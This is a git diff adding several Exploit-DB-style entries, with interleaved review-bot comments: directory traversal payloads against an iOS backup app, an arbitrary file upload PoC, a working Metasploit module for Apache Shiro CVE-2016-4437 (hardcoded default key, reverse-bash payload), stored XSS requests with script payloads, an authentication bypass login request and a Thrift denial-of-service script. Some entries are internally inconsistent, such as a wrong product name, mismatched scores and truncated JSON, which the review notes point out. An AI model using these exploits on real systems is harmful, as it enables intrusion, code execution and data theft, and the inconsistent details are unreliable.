diff --git a/exploits/ios/webapps/48405.txt b/exploits/ios/webapps/48405.txt new file mode 100644 index 000000000..7800e2c3c --- /dev/null +++ b/exploits/ios/webapps/48405.txt 
@@ -0,0 +1,130 @@ +# Title: Super Backup 2.0.5 for iOS - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-30 +# Software: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 +# CVE: N/A + +Document Title: +=============== +Super Backup v2.0.5 iOS - Directory Traversal Vulnerability + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2200 + +Common Vulnerability Scoring System: +==================================== +7.1 + +Product & Service Introduction: +=============================== +Backup all your iPhone or iPad contacts in 1 tap and export them. +Fastest way to restore contacts from PC or Mac. +Export by mailing the backed up contacts file to yourself. Export +contacts file to any other app on your device. +Export all contacts directly to your PC / Mac over Wifi, no software +needed! Restore any contacts directly from +PC / Mac. Restore contacts via mail. Get the ultimate contacts backup +app now. + +(Copy of the Homepage: +https://apps.apple.com/us/app/super-backup-export-import/id1052684097 ) + + +Affected Product(s): +==================== +Dropouts Technologies LLP +Product: Super Backup v2.0.5 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-30: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official Super Backup v2.0.5 ios mobile web-application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability in the app is located in the +`list` and `download` module with the `path` parameter. 
+Attackers are able to change the path variable to request the local list +command. By changing the path parameter the validation +mechanism runs into a logic error that turns back the possibility to +request different pathes outside the basic import/export +folder. Thus way the attacker injects for example local path environment +varibales to compromise the local ios web-application. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. + + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Payloads +%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 +/../../../../../../../../../../../../../../../../../../../../../../%00 +//.././%00 + + +PoC: Exploitation +http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 +http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 + + +--- PoC Session Logs [GET]] --- +http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 +Host: localhost +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +- +GET: HTTP/1.1 200 OK +Content-Length: 174 +Content-Type: application/json +Connection: Close +- +http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 +Host: 
localhost +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Connection: keep-alive +- +GET: HTTP/1.1 200 OK +Content-Length: 174 +Content-Type: application/json +Connection: Close +- +Opening the url allows to download the list file json with content path +output +[{"path":"../../../../../../../../../../../../ "size":21961}] + + +References: +http://localhost/list?path= +http://localhost/download?path= + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48406.txt b/exploits/ios/webapps/48406.txt new file mode 100644 index 000000000..d149b3932 --- /dev/null +++ b/exploits/ios/webapps/48406.txt 
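Review bot: The sample response near the end of the advisory, `[{"path":"../../../../../../../../../../../../ "size":21961}]`, is not valid JSON: the path string is never closed and the comma before `"size"` is missing. It looks truncated and cannot confirm what the `list` endpoint returned, so it should be replaced with the complete response. The write-up also stops at the PoC and gives no remediation; a closing line such as `Solution: canonicalise the path parameter of list and download, reject NUL bytes, and refuse any resolved path outside the import/export folder` would make it usable for the vendor and for defenders. The heading `--- PoC Session Logs [GET]] ---` has a stray bracket.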
@@ -0,0 +1,143 @@ +# Title: HardDrive 2.1 for iOS - Arbitrary File Upload +# Author: Vulnerability Laboratory +# Date: 2020-04-30 +# Software: https://apps.apple.com/ch/app/harddrive/id383226784 +# CVE: N/A + +Document Title: +=============== +HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2221 + + +Common Vulnerability Scoring System: +==================================== +7.4 + + +Product & Service Introduction: +=============================== +Store+Organize+Edit+Protect+Import+Download+View+Share your files right +from your iPhone! Transform your +iPhone/iPod touch into a real HardDrive with no extra cable or software. + +(Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 ) + + +Affected Product(s): +==================== +Sebastien BUET +HardDrive v2.1 - Apple iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-29: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +An arbitrary file upload web vulnerability has been discovered in the +official Air Sender v1.0.2 iOS mobile application. +The web vulnerability allows remote attackers to upload arbitrary files +to compromise for example the file system of a service. + +The arbitrary upload vulnerability is located in the within the +web-server configuration when using the upload module. +Remote attackers are able to bypass the local web-server configuration +by an upload of malicious webshells. Attackers +are able to inject own files with malicious `filen` values in the +`upload` POST method request to compromise the +mobile web-application. The application does not perform checks for +multiple file extensions. Thus allows an attacker +to upload for example to upload a html.js.png file. 
After the upload the +attacker requests the original url source +with the uploaded file and removes the unwanted extension to execute the +code in the unprotected web-frontend. + +The security risk of the vulnerability is estimated as high with a +common vulnerability scoring system count of 7.0. +Exploitation of the web vulnerability requires a low privilege ftp +application user account and no user interaction. +Successful exploitation of the arbitrary file upload web vulnerability +results in application or device compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] ./upload + +Vulnerable File(s): +[+] file + + +Proof of Concept (PoC): +======================= +The arbitrary file upload web vulnerability can be exploited by remote +attackers without user interaction or privileged user accounts. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. + + +PoC: Vulnerable Source (File Dir Listing Index) + +exploit.html.js +size: 256.7 Kb + + +PoC: Exploitation +http://localhost:50071/exploit.html.js + + +--- PoC Session Logs [POST] --- (file) +http://localhost:50071/ +Host: localhost:50071 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------9331569428946906291010349387 +Content-Length: 263181 +Origin: http://localhost:50071 +Connection: keep-alive +Referer: http://localhost:50071/ +file=exploit.html.js.png&button=Submit +POST: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 381654 +- +http://localhost:50071/exploit.html.js +Host: localhost:50071 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: image/webp,*/* +Accept-Language: en-US,en;q=0.5 
+Accept-Encoding: gzip, deflate +Connection: keep-alive +- +http://localhost:50071/exploit.html +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 366735 + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/java/webapps/48408.txt b/exploits/java/webapps/48408.txt new file mode 100644 index 000000000..9cf698878 --- /dev/null +++ b/exploits/java/webapps/48408.txt @@ -0,0 +1,29 @@ +# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) +# Exploit Author: Faiz Ahmed Zaidi +# Vendor Homepage: [https://ofbiz.apache.org/security.html] +# Software Link: https://ofbiz.apache.org/download.html#security +# Version: Before 17.12.03 +# Tested on: Linux and Windows +# CVE : CVE-2019-0235 + +#Exploit Code: + + + +
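Review bot: The Technical Details section of 48406.txt says the flaw was found in "the official Air Sender v1.0.2 iOS mobile application", while the title, header and Affected Product(s) all name HardDrive v2.1. This reads like text carried over from another advisory and leaves the affected product ambiguous. The same section rates the issue at 7.0 although the CVSS block above says 7.4, and it requires "a low privilege ftp application user account" while the PoC introduction says no privileged account is needed. It also refers to a `filen` value where the session log shows `file=`. Product, score and precondition are what defenders triage on, so these should be reconciled before the entry is indexed.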
+ + + + + + + +
+ + + + +After that do a password reset via forget password. +It's done :) \ No newline at end of file diff --git a/exploits/multiple/remote/48410.rb b/exploits/multiple/remote/48410.rb new file mode 100755 index 000000000..ca9223b39 --- /dev/null +++ b/exploits/multiple/remote/48410.rb 
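Review bot: The title line of 48408.txt names Apache OFBiz 17.12.03 as the affected release, but the header's own `# Version: Before 17.12.03` indicates that 17.12.03 is the fixed version. The title, and the matching row added to files_exploits.csv, should read along the lines of `Apache OFBiz < 17.12.03`. As shown here the "Exploit Code" section is empty, and the closing step ("do a password reset via forget password") does not say which account attribute the forged request changes. The account-takeover claim therefore cannot be assessed from the text; a one-line description of the state change and the required victim session would close that gap.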
@@ -0,0 +1,82 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE', + 'Description' => %q{ + This vulnerability allows remote attackers to execute arbitrary code on vulnerable + installations of Apache Shiro v1.2.4. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'L / l-codes[at]qq.com' # Metasploit module + ], + 'References' => + [ + ['CVE', '2016-4437'], + ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1'] + ], + 'Platform' => %w{ win unix }, + 'Arch' => [ ARCH_CMD ], + 'Targets' => + [ + [ + 'Unix Command payload', + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} + ], + [ + 'Windows Command payload', + 'Arch' => ARCH_CMD, + 'Platform' => 'win' + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 7 2016', + 'Privileged' => false, + 'DefaultOptions' => + { + 'WfsDelay' => 5 + } + ) + ) + register_options( + [ + OptString.new('TARGETURI', [ true, 'Base directory path', '/']) + ]) + end + + def aes_encrypt(payload) + aes = OpenSSL::Cipher.new('aes-128-cbc') + aes.encrypt + aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==') + aes.random_iv + aes.update(payload) + aes.final + end + + def exploit + cmd = payload.encoded + vprint_status("Execute CMD: #{cmd}") + type = ( target.name == 'Unix Command payload' ? 
'bash' : 'cmd' ) + java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type) + ciphertext = aes_encrypt(java_payload) + base64_ciphertext = Rex::Text.encode_base64(ciphertext) + + send_request_cgi({ + 'uri' => target_uri.path, + 'method' => 'GET', + 'cookie' => "rememberMe=#{base64_ciphertext}" + }) + end + +end \ No newline at end of file diff --git a/exploits/php/webapps/48401.txt b/exploits/php/webapps/48401.txt new file mode 100644 index 000000000..b31fbef5c --- /dev/null +++ b/exploits/php/webapps/48401.txt 
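Review bot: The base64 constant assigned to `aes.key` in `aes_encrypt` is unexplained, and the module `Description` does not state the root cause of CVE-2016-4437. A comment above that line would make clear why the value is fixed and what takes an installation out of scope, for example `# Default rememberMe cipher key shipped with Apache Shiro 1.2.4 (CVE-2016-4437); deployments that configure their own key do not use this value`. The `Description` could also name the fixed release and the configuration setting, so that readers know the mitigation is an upgrade or a unique cipher key.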
@@ -0,0 +1,55 @@ +# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting +# Exploit Author: Bobby Cooke +# Date: 2020-04-29 +# Software Link: https://github.com/tmorrell/cheminv +# Software Info: +# "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users." +# "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University" +# "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog." +# Version: 1 +# Tested On: CentOS +# Vulnerability Type: +# ChemInv suffers from a persistent cross-site scripting vulnerability(XSS). This vulnerability can be exploited to have all users of the system, with read access to the project, execute malicious client-side code; every time the users views the 'Projects' or 'Add Chemicals' tab. +# The application's source code mitigates SQL injection (SQLi), but fails to sanitize HTML and JavaScript injections to the SQL database. + +# Vulnerable Source Code +## proj_list.php + 33 include('include/include_proj_add.php'); + 34 $AddProj = new ProjAdd; + 35 $AddProj->AddProj(); + 36 + 37 $proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner"); +## include/include_proj_add.php + 2 class ProjAdd { + 3 public function AddProj () { + 4 + 5 require_once('include/login/auth.php'); + 6 include('include/mysql_connect.php'); + 7 + 8 if(isset($_POST['submit'])) { + 9 $owner = $_SESSION['SESS_MEMBER_ID']; + 10 $name = mysql_real_escape_string($_POST['name']); + 11 + 12 if ($name == '') { + 13 echo '
'; + 14 echo 'You have to specify a name!'; + 15 echo '
'; + 16 } + 17 else { + 18 $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')"; + 19 $sql_exec = mysql_query($sql); + +# Malicious POST Request to https://TARGET/proj_list.php + POST /proj_list.php HTTP/1.1 + Host: TARGET + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: https://TARGET/proj_list.php + Content-Type: application/x-www-form-urlencoded + Content-Length: 16 + Connection: close + Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85 + + name=evilProject&submit= \ No newline at end of file diff --git a/exploits/php/webapps/48403.txt b/exploits/php/webapps/48403.txt new file mode 100644 index 000000000..008a66ccf --- /dev/null +++ b/exploits/php/webapps/48403.txt 
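Review bot: The quoted include/include_proj_add.php shows `mysql_real_escape_string` applied to `$_POST['name']` before the INSERT, which only makes the value safe for SQL syntax. The advisory never quotes the line that prints `project_name` back into the 'Projects' or 'Add Chemicals' page, which is where the stored script runs and where the fix belongs. Adding that output line to "Vulnerable Source Code", with a remediation such as `echo htmlspecialchars($row['project_name'], ENT_QUOTES, 'UTF-8');` (variable name illustrative), would make the root cause explicit. The sample request also declares `Content-Length: 16` for the 24-byte body `name=evilProject&submit=`, so the body shown is probably not the one that was sent. The PHPSESSID value would be better as a placeholder.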
@@ -0,0 +1,26 @@ +# Exploit Title: Online Scheduling System 1.0 - Persistent Cross-Site Scripting +# Exploit Author: Bobby Cooke +# Date: 2020-04-30 +# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 +# Vulnerability Info: +# Online Scheduling System v1.0 suffers from an authenticated persistent cross-site scripting vulnerability. This Proof of Concept (PoC) will cause all users of the system, with read access to the courses, to execute arbitrary client-side code when viewing the 'Home' and 'List' tabs within the web application. The application fails to sanitize arguments supplied by the user before inserting them into the SQL database. + +# Vulnerable Source Code +## /add.cor.php + 14 $Course_Code = $_POST['corcode']; + 15 $Course_name = $_POST['corname']; + 16 + 17 $sql = "INSERT INTO course (Course_Code, Course_name) VALUES ('$Course_Code', '$Course_name')"; + +# Malicious POST Request + POST /Online%20Scheduling%20System/add.cor.php HTTP/1.1 + Host: 172.16.65.130 + Referer: http://172.16.65.130/Online%20Scheduling%20System/addcourse.php + Content-Type: application/x-www-form-urlencoded + Connection: close + Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 + + corcode=XSS-101&corname=%3Cscript%3Ealert%28%22XSS-101%22%29%3B%3C%2Fscript%3E&submit= \ No newline at end of file diff --git a/exploits/php/webapps/48404.txt b/exploits/php/webapps/48404.txt new file mode 100644 index 000000000..36428e78b --- /dev/null +++ b/exploits/php/webapps/48404.txt 
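Review bot: Lines 14-17 of add.cor.php as quoted place `$_POST['corcode']` and `$_POST['corname']` straight into the INSERT string, so the same code is open to SQL injection as well as stored XSS. The title and "Vulnerability Info" classify it as XSS only. The advisory should name both weaknesses and the fix for each: a prepared statement with bound parameters for the INSERT, and `htmlspecialchars(..., ENT_QUOTES, 'UTF-8')` where course values are rendered on the 'Home' and 'List' tabs. The request also publishes a lab address and a PHPSESSID value; the `TARGET` placeholder used in the sibling 48409.txt would be consistent.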
@@ -0,0 +1,102 @@ +# Exploit Title: php-fusion 9.03.50 - Persistent Cross-Site Scripting +# Google Dork: "php-fusion" +# Date: 2020-04-30 +# Exploit Author: SunCSR (Sun* Cyber Security Research) +# Vendor Homepage: https://www.php-fusion.co.uk/ +# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30 +# Version: 9.03.50 +# Tested on: Windows +# CVE : N/A + +### Vulnerability : Persistent Cross-Site Scripting + +###Describe the bug +Persistent Cross-site scripting (Stored XSS) vulnerabilities in PHP-Fusion 9.03.50 allow remote attackers to inject arbitrary web script or HTML +via the go parameter to /infusions/faq/faq_admin.php, /infusions/shoutbox_panel/shoutbox_admin.php + +###To Reproduce +Steps to reproduce the behavior: +Authenticated user submit Q&A or Shoutbox to admin + +### POC: +## Submit Q&A: + +POST /php-fusion/submit.php?stype=q HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------68756068726681644952075211938 +Content-Length: 1146 +Origin: http://TARGET +DNT: 1 +Connection: close +Referer: http://TARGET/php-fusion/submit.php?stype=q +Cookie: xxx +Upgrade-Insecure-Requests: 1 + +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="fusion_token" + +2-1588232750-f839ed0754d5dc8aa577cfb660e273e711ec03a9a782de90ac34860cdb45a8f1 +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="form_id" + +submit_form +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="fusion_PR57qY" + + +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="faq_question" + 
+Question XSS +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="faq_answer" + +xss +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="faq_cat_id" + +1 +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="faq_language[]" + +English +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="submit_link" + +Submit +-----------------------------68756068726681644952075211938-- + +## Shoutbox + +POST /php-fusion/infusions/downloads/downloads.php?cat_id=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 272 +Origin: http://TARGET +DNT: 1 +Connection: close +Referer: http://TARGET/php-fusion/infusions/downloads/downloads.php?cat_id=1 +Cookie: xxx +Upgrade-Insecure-Requests: 1 + +fusion_token=2-1588233429-3df5ba2b9c690e833548645f66a7772cf7fdb24ca9be130d5ff01e26351a2771&form_id=sbpanel&fusion_gEHiPs=&shout_id=0 +&shout_hidden=&shout_message=xss&shout_language=English&shout_box=Save+Shout + + +###Reference: +https://github.com/php-fusion/PHP-Fusion/issues/2306 + +### History +============= +2020-04-09 Issue discovered +2020-04-14 Vendor contacted +2020-04-28 Vendor response and hotfix +2020-04-29 Vendor releases fixed \ No newline at end of file diff --git a/exploits/php/webapps/48409.txt b/exploits/php/webapps/48409.txt new file mode 100644 index 000000000..73ff77f28 --- /dev/null +++ b/exploits/php/webapps/48409.txt 
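Review bot: The description attributes the injection to "the go parameter" of faq_admin.php and shoutbox_admin.php, but neither request in the POC contains a `go` parameter. They post to `submit.php?stype=q` and `downloads.php?cat_id=1` with the fields `faq_question`, `faq_answer` and `shout_message`. The text should state which submitted fields are stored unescaped and that the admin pages are where they are rendered. Without that, a reader cannot map the report to the vendor fix referenced under "Reference". The captured `fusion_token` values could be replaced with placeholders, as was done for the Cookie header.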
@@ -0,0 +1,15 @@
+# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass
+# Exploit Author: Bobby Cooke
+# Date: 2020-04-30
+# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+# Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1
+ POST /Online%20Scheduling%20System/login.php HTTP/1.1
+ Host: TARGET
+ Connection: close
+ Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60
+
+ username=0&password=0&lgn=Login
\ No newline at end of file
diff --git a/exploits/windows/dos/48402.py b/exploits/windows/dos/48402.py
new file mode 100755
index 000000000..d7049773f
--- /dev/null
+++ b/exploits/windows/dos/48402.py
@@ -0,0 +1,28 @@
+# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC)
+# Author: Dolev Farhi
+# Date: 2020-04-29
+# Vulnerable version: 3.0.2 (14)
+# Link: http://www.sunnysidesoft.com/
+# CVE: N/A
+
+
+from thrift import Thrift
+from thrift.transport import TSocket
+from thrift.transport import TTransport
+from thrift.protocol import TBinaryProtocol
+from pygen.example import Example
+
+host = '192.168.1.1'
+port = 57110
+
+try:
+ transport = TSocket.TSocket(host, port)
+ transport = TTransport.TBufferedTransport(transport)
+ protocol = TBinaryProtocol.TBinaryProtocol(transport)
+ client = Example.Client(protocol)
+ transport.open()
+ client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
+ transport.close()
+
+except Thrift.TException as tx:
+ print(tx.message)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3ec66afac..95fd3e845 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
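Review bot: 48409.txt consists of a header and a single login request and never says why `username=0&password=0` is accepted. Unlike 48403.txt for the same product, there is no "Vulnerable Source Code" section. A maintainer therefore cannot tell whether the cause is a loose comparison, SQL type coercion or something else, nor what to change. Quoting the relevant login.php lines and adding a one-line remediation would make the report actionable. The heading line also ends in a stray `HTTP/1.1` after the URL.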
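Review bot: `from pygen.example import Example` in 48402.py refers to generated Thrift bindings that are not part of this commit and are not mentioned in the header, so the file cannot be run or reviewed as submitted. A comment naming the IDL they were generated from is needed. The header also gives no description of the fault: it does not say how the server reacts to the `send_say` message or which property of the input matters, which is what a vendor or defender needs to act on the report. Separately, `transport.close()` sits inside the `try` body, so the socket is left open when a `TException` is raised; moving it to `finally: transport.close()` would fix that.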
@@ -6729,6 +6729,7 @@ id,file,description,date,author,type,platform,port
 48304,exploits/hardware/dos/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",dos,hardware,
 48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware,
+48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -18134,6 +18135,7 @@ id,file,description,date,author,type,platform,port
 48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
 48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
+48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42635,3 +42637,10 @@ id,file,description,date,author,type,platform,port
 48394,exploits/php/webapps/48394.txt,"School ERP Pro 1.0 - Arbitrary File Read",2020-04-29,Besim,webapps,php,
 48395,exploits/ios/webapps/48395.txt,"Easy Transfer 1.7 for iOS - Directory Traversal",2020-04-29,Vulnerability-Lab,webapps,ios,
 48399,exploits/php/webapps/48399.txt,"hits script 1.0 - 'item_name' SQL Injection",2020-04-29,SajjadBnd,webapps,php,
+48401,exploits/php/webapps/48401.txt,"ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php,
+48403,exploits/php/webapps/48403.txt,"Online Scheduling System 1.0 - Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php,
+48404,exploits/php/webapps/48404.txt,"php-fusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-01,SunCSR,webapps,php,
+48405,exploits/ios/webapps/48405.txt,"Super Backup 2.0.5 for iOS - Directory Traversal",2020-05-01,Vulnerability-Lab,webapps,ios,
+48406,exploits/ios/webapps/48406.txt,"HardDrive 2.1 for iOS - Arbitrary File Upload",2020-05-01,Vulnerability-Lab,webapps,ios,
+48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,
+48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,